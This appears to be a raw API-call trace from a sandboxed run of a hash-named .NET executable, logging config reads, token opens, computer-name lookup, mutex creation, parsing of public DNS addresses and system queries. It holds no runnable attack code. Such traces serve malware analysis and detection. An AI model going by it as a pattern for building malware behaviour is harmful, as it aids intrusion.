[0205.767] GetLastError () returned 0x3f0
[0205.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x19e088, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e
[0205.781] GetLastError () returned 0x0
[0205.818] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x19e530 | out: lpFileInformation=0x19e530*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf4e31bc, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xdd8a827a, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xe8659c4d, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1
[0205.819] GetLastError () returned 0x0
[0205.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19e044, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0205.824] GetLastError () returned 0x0
[0205.825] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x19e528 | out: lpFileInformation=0x19e528*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf4e31bc, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xdd8a827a, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xe8659c4d, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1
[0205.825] GetLastError () returned 0x0
[0205.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19df90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0205.825] GetLastError () returned 0x0
[0205.825] SetErrorMode (uMode=0x1) returned 0x0
[0205.825] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x408
[0205.826] GetLastError () returned 0x0
[0205.826] GetFileType (hFile=0x408) returned 0x1
[0205.826] SetErrorMode (uMode=0x0) returned 0x1
[0205.826] GetFileType (hFile=0x408) returned 0x1
[0205.870] GetFileSize (in: hFile=0x408, lpFileSizeHigh=0x19e50c | out: lpFileSizeHigh=0x19e50c*=0x0) returned 0x65b3
[0205.870] GetLastError () returned 0x0
[0205.871] ReadFile (in: hFile=0x408, lpBuffer=0x2569968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e4c4, lpOverlapped=0x0 | out: lpBuffer=0x2569968*, lpNumberOfBytesRead=0x19e4c4*=0x1000, lpOverlapped=0x0) returned 1
[0205.871] GetLastError () returned 0x0
[0206.313] ReadFile (in: hFile=0x408, lpBuffer=0x2569968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e0e0, lpOverlapped=0x0 | out: lpBuffer=0x2569968*, lpNumberOfBytesRead=0x19e0e0*=0x1000, lpOverlapped=0x0) returned 1
[0206.314] GetLastError () returned 0x0
[0206.354] ReadFile (in: hFile=0x408, lpBuffer=0x2569968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19df24, lpOverlapped=0x0 | out: lpBuffer=0x2569968*, lpNumberOfBytesRead=0x19df24*=0x1000, lpOverlapped=0x0) returned 1
[0206.354] GetLastError () returned 0x0
[0206.355] ReadFile (in: hFile=0x408, lpBuffer=0x2569968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19df24, lpOverlapped=0x0 | out: lpBuffer=0x2569968*, lpNumberOfBytesRead=0x19df24*=0x1000, lpOverlapped=0x0) returned 1
[0206.355] GetLastError () returned 0x0
[0206.355] ReadFile (in: hFile=0x408, lpBuffer=0x2569968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19df24, lpOverlapped=0x0 | out: lpBuffer=0x2569968*, lpNumberOfBytesRead=0x19df24*=0x1000, lpOverlapped=0x0) returned 1
[0206.355] GetLastError () returned 0x0
[0207.199] ReadFile (in: hFile=0x408, lpBuffer=0x2569968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e054, lpOverlapped=0x0 | out: lpBuffer=0x2569968*, lpNumberOfBytesRead=0x19e054*=0x1000, lpOverlapped=0x0) returned 1
[0207.250] GetLastError () returned 0x0
[0207.251] ReadFile (in: hFile=0x408, lpBuffer=0x2569968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19de0c, lpOverlapped=0x0 | out: lpBuffer=0x2569968*, lpNumberOfBytesRead=0x19de0c*=0x5b3, lpOverlapped=0x0) returned 1
[0207.251] GetLastError () returned 0x0
[0207.253] ReadFile (in: hFile=0x408, lpBuffer=0x2569968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19dfa8, lpOverlapped=0x0 | out: lpBuffer=0x2569968*, lpNumberOfBytesRead=0x19dfa8*=0x0, lpOverlapped=0x0) returned 1
[0207.253] GetLastError () returned 0x0
[0207.628] CloseHandle (hObject=0x408) returned 1
[0207.629] GetLastError () returned 0x0
[0207.645] GetCurrentProcess () returned 0xffffffff
[0207.645] GetLastError () returned 0x3f0
[0207.645] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e800 | out: TokenHandle=0x19e800*=0x408) returned 1
[0207.645] GetLastError () returned 0x3f0
[0207.652] GetCurrentProcess () returned 0xffffffff
[0207.652] GetLastError () returned 0x3f0
[0207.652] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e800 | out: TokenHandle=0x19e800*=0x404) returned 1
[0207.652] GetLastError () returned 0x3f0
[0207.657] GetCurrentProcess () returned 0xffffffff
[0207.657] GetLastError () returned 0x3f0
[0207.658] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e4ec | out: TokenHandle=0x19e4ec*=0x40c) returned 1
[0207.658] GetLastError () returned 0x3f0
[0207.693] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config"), fInfoLevelId=0x0, lpFileInformation=0x19e530 | out: lpFileInformation=0x19e530*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0207.693] GetLastError () returned 0x2
[0207.695] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", nBufferLength=0x105, lpBuffer=0x19e044, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", lpFilePart=0x0) returned 0x65
[0207.695] GetLastError () returned 0x2
[0207.695] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config"), fInfoLevelId=0x0, lpFileInformation=0x19e528 | out: lpFileInformation=0x19e528*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0207.695] GetLastError () returned 0x2
[0207.696] GetCurrentProcess () returned 0xffffffff
[0207.696] GetLastError () returned 0x3f0
[0207.696] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e800 | out: TokenHandle=0x19e800*=0x410) returned 1
[0207.696] GetLastError () returned 0x3f0
[0207.704] GetCurrentProcess () returned 0xffffffff
[0207.704] GetLastError () returned 0x3f0
[0207.704] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e800 | out: TokenHandle=0x19e800*=0x414) returned 1
[0207.704] GetLastError () returned 0x3f0
[0207.785] GetCurrentProcess () returned 0xffffffff
[0207.785] GetLastError () returned 0x3f0
[0207.785] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e5e4 | out: TokenHandle=0x19e5e4*=0x418) returned 1
[0207.785] GetLastError () returned 0x3f0
[0208.013] GetCurrentProcess () returned 0xffffffff
[0208.014] GetLastError () returned 0x3f0
[0208.015] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e5f4 | out: TokenHandle=0x19e5f4*=0x41c) returned 1
[0208.020] GetLastError () returned 0x3f0
[0208.707] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19e3ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0208.707] GetLastError () returned 0x3f0
[0208.710] GetCurrentProcessId () returned 0x9a8
[0208.714] GetComputerNameW (in: lpBuffer=0x673930, nSize=0x26910e0 | out: lpBuffer="XC64ZB", nSize=0x26910e0) returned 1
[0208.717] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e850 | out: phkResult=0x19e850*=0x420) returned 0x0
[0208.722] RegQueryValueExW (in: hKey=0x420, lpValueName="Library", lpReserved=0x0, lpType=0x19e88c, lpData=0x0, lpcbData=0x19e888*=0x0 | out: lpType=0x19e88c*=0x2, lpData=0x0, lpcbData=0x19e888*=0x48) returned 0x0
[0208.722] RegQueryValueExW (in: hKey=0x420, lpValueName="Library", lpReserved=0x0, lpType=0x19e88c, lpData=0x673930, lpcbData=0x19e888*=0x48 | out: lpType=0x19e88c*=0x2, lpData="%systemroot%\\system32\\netfxperf.dll", lpcbData=0x19e888*=0x48) returned 0x0
[0208.723] RegQueryValueExW (in: hKey=0x420, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x19e898, lpData=0x0, lpcbData=0x19e894*=0x0 | out: lpType=0x19e898*=0x4, lpData=0x0, lpcbData=0x19e894*=0x4) returned 0x0
[0208.724] RegQueryValueExW (in: hKey=0x420, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x19e898, lpData=0x19e884, lpcbData=0x19e894*=0x4 | out: lpType=0x19e898*=0x4, lpData=0x19e884*=0x1, lpcbData=0x19e894*=0x4) returned 0x0
[0208.724] RegQueryValueExW (in: hKey=0x420, lpValueName="First Counter", lpReserved=0x0, lpType=0x19e898, lpData=0x0, lpcbData=0x19e894*=0x0 | out: lpType=0x19e898*=0x4, lpData=0x0, lpcbData=0x19e894*=0x4) returned 0x0
[0208.724] RegQueryValueExW (in: hKey=0x420, lpValueName="First Counter", lpReserved=0x0, lpType=0x19e898, lpData=0x19e884, lpcbData=0x19e894*=0x4 | out: lpType=0x19e898*=0x4, lpData=0x19e884*=0x1770, lpcbData=0x19e894*=0x4) returned 0x0
[0208.724] RegCloseKey (hKey=0x420) returned 0x0
[0208.727] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e840 | out: phkResult=0x19e840*=0x420) returned 0x0
[0208.728] RegQueryValueExW (in: hKey=0x420, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x19e888, lpData=0x0, lpcbData=0x19e884*=0x0 | out: lpType=0x19e888*=0x4, lpData=0x0, lpcbData=0x19e884*=0x4) returned 0x0
[0208.728] RegQueryValueExW (in: hKey=0x420, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x19e888, lpData=0x19e874, lpcbData=0x19e884*=0x4 | out: lpType=0x19e888*=0x4, lpData=0x19e874*=0x3, lpcbData=0x19e884*=0x4) returned 0x0
[0208.728] RegQueryValueExW (in: hKey=0x420, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x19e888, lpData=0x0, lpcbData=0x19e884*=0x0 | out: lpType=0x19e888*=0x4, lpData=0x0, lpcbData=0x19e884*=0x4) returned 0x0
[0208.728] RegQueryValueExW (in: hKey=0x420, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x19e888, lpData=0x19e874, lpcbData=0x19e884*=0x4 | out: lpType=0x19e888*=0x4, lpData=0x19e874*=0x20000, lpcbData=0x19e884*=0x4) returned 0x0
[0208.729] RegQueryValueExW (in: hKey=0x420, lpValueName="Counter Names", lpReserved=0x0, lpType=0x19e888, lpData=0x0, lpcbData=0x19e884*=0x0 | out: lpType=0x19e888*=0x3, lpData=0x0, lpcbData=0x19e884*=0xaa) returned 0x0
[0208.729] RegQueryValueExW (in: hKey=0x420, lpValueName="Counter Names", lpReserved=0x0, lpType=0x19e888, lpData=0x26937f8, lpcbData=0x19e884*=0xaa | out: lpType=0x19e888*=0x3, lpData=0x26937f8*, lpcbData=0x19e884*=0xaa) returned 0x0
[0208.774] ConvertStringSecurityDescriptorToSecurityDescriptorW (in: StringSecurityDescriptor="D:(A;OICI;FRFWGRGW;;;AU)(A;OICI;FRFWGRGW;;;S-1-5-33)", StringSDRevision=0x1, SecurityDescriptor=0x19e7f4, SecurityDescriptorSize=0x0 | out: SecurityDescriptor=0x19e7f4*=0x0*(Revision=0x1, Sbz1=0x0, Control=0x8004, Owner=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0), Group=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x14), Sacl=0x0*(AclRevision=0x0, Sbz1=0x0, AclSize=0x0, AceCount=0x14, Sbz2=0x0), Dacl=0x14*(AclRevision=0x14, Sbz1=0x0, AclSize=0x0, AceCount=0x2, Sbz2=0x30)), SecurityDescriptorSize=0x0) returned 1
[0208.778] GetLastError () returned 0x0
[0208.783] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x673960, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x424
[0208.792] GetLastError () returned 0x0
[0208.865] MapViewOfFile (hFileMappingObject=0x424, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x5cd0000
[0208.868] VirtualQuery (in: lpAddress=0x5cd0000, lpBuffer=0x19e858, dwLength=0x1c | out: lpBuffer=0x19e858*(BaseAddress=0x5cd0000, AllocationBase=0x5cd0000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c
[0208.868] GetLastError () returned 0x0
[0208.869] LocalFree (hMem=0x66bb88) returned 0x0
[0208.869] RegCloseKey (hKey=0x420) returned 0x0
[0208.871] GetVersionExW (in: lpVersionInformation=0x673948*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x673948*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0208.872] GetLastError () returned 0x0
[0208.876] GetVersionExW (in: lpVersionInformation=0x673948*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x673948*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0208.876] GetLastError () returned 0x0
[0208.877] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x251049c, cbSid=0x19e838 | out: pSid=0x251049c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e838) returned 1
[0208.877] GetLastError () returned 0x0
[0208.902] CreateMutexW (lpMutexAttributes=0x25105d4, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x420
[0208.902] GetLastError () returned 0x0
[0208.904] WaitForSingleObject (hHandle=0x420, dwMilliseconds=0x1f4) returned 0x0
[0208.904] GetLastError () returned 0x0
[0208.904] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x25107a8, cbSid=0x19e7f8 | out: pSid=0x25107a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e7f8) returned 1
[0208.904] GetLastError () returned 0x0
[0208.905] CreateMutexW (lpMutexAttributes=0x25108b8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
[0208.905] GetLastError () returned 0x5
[0208.906] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x40c
[0208.906] GetLastError () returned 0x5
[0208.906] WaitForSingleObject (hHandle=0x40c, dwMilliseconds=0x1f4) returned 0x0
[0208.907] GetLastError () returned 0x5
[0208.907] ReleaseMutex (hMutex=0x40c) returned 1
[0208.907] GetLastError () returned 0x5
[0208.907] CloseHandle (hObject=0x40c) returned 1
[0208.907] GetLastError () returned 0x5
[0208.907] GetCurrentProcessId () returned 0x9a8
[0208.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a8) returned 0x40c
[0208.909] GetLastError () returned 0x5
[0208.910] GetProcessTimes (in: hProcess=0x40c, lpCreationTime=0x19e7fc, lpExitTime=0x19e7f4, lpKernelTime=0x19e7f4, lpUserTime=0x19e7f4 | out: lpCreationTime=0x19e7fc, lpExitTime=0x19e7f4, lpKernelTime=0x19e7f4, lpUserTime=0x19e7f4) returned 1
[0208.910] GetLastError () returned 0x5
[0208.911] CloseHandle (hObject=0x40c) returned 1
[0208.911] GetLastError () returned 0x5
[0208.911] ReleaseMutex (hMutex=0x420) returned 1
[0208.912] GetLastError () returned 0x5
[0208.912] CloseHandle (hObject=0x420) returned 1
[0208.912] GetLastError () returned 0x5
[0208.912] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x25110c8, cbSid=0x19e838 | out: pSid=0x25110c8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e838) returned 1
[0208.912] GetLastError () returned 0x5
[0208.913] CreateMutexW (lpMutexAttributes=0x25111d8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x420
[0208.979] GetLastError () returned 0x0
[0208.980] WaitForSingleObject (hHandle=0x420, dwMilliseconds=0x1f4) returned 0x0
[0208.980] GetLastError () returned 0x0
[0208.981] ReleaseMutex (hMutex=0x420) returned 1
[0208.981] GetLastError () returned 0x0
[0208.981] CloseHandle (hObject=0x420) returned 1
[0208.981] GetLastError () returned 0x0
[0208.982] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x255c3c4, cbSid=0x19e838 | out: pSid=0x255c3c4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e838) returned 1
[0208.982] GetLastError () returned 0x0
[0208.982] CreateMutexW (lpMutexAttributes=0x255c4d4, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x420
[0208.983] GetLastError () returned 0x0
[0208.983] WaitForSingleObject (hHandle=0x420, dwMilliseconds=0x1f4) returned 0x0
[0208.983] GetLastError () returned 0x0
[0208.983] ReleaseMutex (hMutex=0x420) returned 1
[0208.983] GetLastError () returned 0x0
[0208.983] CloseHandle (hObject=0x420) returned 1
[0208.984] GetLastError () returned 0x0
[0208.984] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x255cb60, cbSid=0x19e838 | out: pSid=0x255cb60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e838) returned 1
[0208.984] GetLastError () returned 0x0
[0208.985] CreateMutexW (lpMutexAttributes=0x255cc70, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x420
[0208.985] GetLastError () returned 0x0
[0208.985] WaitForSingleObject (hHandle=0x420, dwMilliseconds=0x1f4) returned 0x0
[0208.985] GetLastError () returned 0x0
[0208.986] ReleaseMutex (hMutex=0x420) returned 1
[0208.986] GetLastError () returned 0x0
[0208.986] CloseHandle (hObject=0x420) returned 1
[0208.986] GetLastError () returned 0x0
[0208.986] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x255d2f4, cbSid=0x19e838 | out: pSid=0x255d2f4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e838) returned 1
[0208.989] GetLastError () returned 0x0
[0208.990] CreateMutexW (lpMutexAttributes=0x255d404, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x420
[0208.990] GetLastError () returned 0x0
[0208.990] WaitForSingleObject (hHandle=0x420, dwMilliseconds=0x1f4) returned 0x0
[0208.990] GetLastError () returned 0x0
[0208.993] ReleaseMutex (hMutex=0x420) returned 1
[0208.993] GetLastError () returned 0x0
[0208.993] CloseHandle (hObject=0x420) returned 1
[0208.993] GetLastError () returned 0x0
[0208.994] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x255da80, cbSid=0x19e830 | out: pSid=0x255da80*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e830) returned 1
[0208.994] GetLastError () returned 0x0
[0209.000] CreateMutexW (lpMutexAttributes=0x255db90, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x420
[0209.000] GetLastError () returned 0x0
[0209.001] WaitForSingleObject (hHandle=0x420, dwMilliseconds=0x1f4) returned 0x0
[0209.001] GetLastError () returned 0x0
[0209.001] ReleaseMutex (hMutex=0x420) returned 1
[0209.001] GetLastError () returned 0x0
[0209.002] CloseHandle (hObject=0x420) returned 1
[0209.002] GetLastError () returned 0x0
[0209.002] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x255e218, cbSid=0x19e830 | out: pSid=0x255e218*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e830) returned 1
[0209.002] GetLastError () returned 0x0
[0209.003] CreateMutexW (lpMutexAttributes=0x255e328, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x420
[0209.003] GetLastError () returned 0x0
[0209.003] WaitForSingleObject (hHandle=0x420, dwMilliseconds=0x1f4) returned 0x0
[0209.003] GetLastError () returned 0x0
[0209.003] ReleaseMutex (hMutex=0x420) returned 1
[0209.004] GetLastError () returned 0x0
[0209.004] CloseHandle (hObject=0x420) returned 1
[0209.004] GetLastError () returned 0x0
[0209.004] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x255e98c, cbSid=0x19e830 | out: pSid=0x255e98c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e830) returned 1
[0209.004] GetLastError () returned 0x0
[0209.005] CreateMutexW (lpMutexAttributes=0x255ea9c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x420
[0209.005] GetLastError () returned 0x0
[0209.005] WaitForSingleObject (hHandle=0x420, dwMilliseconds=0x1f4) returned 0x0
[0209.005] GetLastError () returned 0x0
[0209.006] ReleaseMutex (hMutex=0x420) returned 1
[0209.006] GetLastError () returned 0x0
[0209.006] CloseHandle (hObject=0x420) returned 1
[0209.006] GetLastError () returned 0x0
[0209.006] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x255f110, cbSid=0x19e830 | out: pSid=0x255f110*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e830) returned 1
[0209.007] GetLastError () returned 0x0
[0209.007] CreateMutexW (lpMutexAttributes=0x255f220, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x420
[0209.007] GetLastError () returned 0x0
[0209.008] WaitForSingleObject (hHandle=0x420, dwMilliseconds=0x1f4) returned 0x0
[0209.008] GetLastError () returned 0x0
[0209.008] ReleaseMutex (hMutex=0x420) returned 1
[0209.008] GetLastError () returned 0x0
[0209.008] CloseHandle (hObject=0x420) returned 1
[0209.008] GetLastError () returned 0x0
[0209.008] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x255f88c, cbSid=0x19e830 | out: pSid=0x255f88c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e830) returned 1
[0209.008] GetLastError () returned 0x0
[0209.009] CreateMutexW (lpMutexAttributes=0x255f99c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x420
[0209.009] GetLastError () returned 0x0
[0209.009] WaitForSingleObject (hHandle=0x420, dwMilliseconds=0x1f4) returned 0x0
[0209.009] GetLastError () returned 0x0
[0209.010] ReleaseMutex (hMutex=0x420) returned 1
[0209.010] GetLastError () returned 0x0
[0209.010] CloseHandle (hObject=0x420) returned 1
[0209.010] GetLastError () returned 0x0
[0209.045] inet_addr (cp="8.8.8.8") returned 0x8080808
[0209.045] GetLastError () returned 0x0
[0209.047] inet_addr (cp="8.8.4.4") returned 0x4040808
[0209.047] GetLastError () returned 0x0
[0209.167] GetSystemInfo (in: lpSystemInfo=0x19e288 | out: lpSystemInfo=0x19e288*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5507))
[0209.167] GetLastError () returned 0x0
[0209.179] PeekMessageW (in: lpMsg=0x19f320, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f320) returned 0
[0209.237] PeekMessageW (in: lpMsg=0x19f320, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f320) returned 0
